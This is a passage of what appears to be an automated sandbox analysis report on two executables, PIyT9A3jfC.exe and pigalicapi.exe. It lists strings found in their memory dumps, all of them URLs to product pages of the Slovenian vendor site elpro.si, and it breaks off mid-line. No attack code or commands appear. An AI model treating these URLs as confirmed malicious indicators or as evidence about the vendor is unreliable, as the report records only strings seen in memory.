                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/registr
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/tempera
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-brezz
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-seti/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-vecka
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-vsi/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-za-ex
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/hladna-veriga-in-pr
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/programska-oprema-z
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/rutinske-kontrole/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/validacije/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/katalogi-prospekti-brosure-dokumenti/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, 